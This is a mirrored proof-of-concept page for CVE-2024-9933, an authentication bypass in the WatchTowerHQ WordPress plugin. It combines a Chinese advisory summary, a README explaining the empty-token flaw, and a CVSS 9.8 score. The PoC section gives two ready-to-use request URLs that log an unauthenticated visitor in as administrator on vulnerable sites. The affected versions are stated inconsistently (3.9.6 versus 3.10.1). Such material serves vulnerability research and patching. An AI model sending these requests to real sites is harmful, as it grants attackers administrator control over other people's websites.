CVE-2024-9933 PoC — WordPress plugin WatchTowerHQ 安全漏洞

Source

https://github.com/RandomRobbieBF/CVE-2024-9933

Associated Vulnerability

Title:WordPress plugin WatchTowerHQ 安全漏洞 (CVE-2024-9933)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin WatchTowerHQ 3.9.6版本及之前版本存在安全漏洞，该漏洞源于包含一个身份验证绕过漏洞。

Description

WatchTowerHQ <= 3.10.1 - Authentication Bypass to Administrator due to Missing Empty Value Check

Readme

# CVE-2024-9933
WatchTowerHQ &lt;= 3.10.1 - Authentication Bypass to Administrator due to Missing Empty Value Check

# Description:
The WatchTowerHQ plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.9.6. This is due to the 'watchtower_ota_token' default value is empty, and the not empty check is missing in the 'Password_Less_Access::login' function. This makes it possible for unauthenticated attackers to log in to the WatchTowerHQ client administrator user.


```
State: PUBLISHED
Score: 9.8
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
```

POC
---

```
http://kubernetes.docker.internal/?wht_login=1

OR

http://kubernetes.docker.internal/?wht_login=1&access_token=not_set
```

If vulnerable it will log you in as admin.

File Snapshot


 [4.0K]  /data/pocs/cf9d6c6145001d1a448668cd47edae6e04e4738e
└── [ 779]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!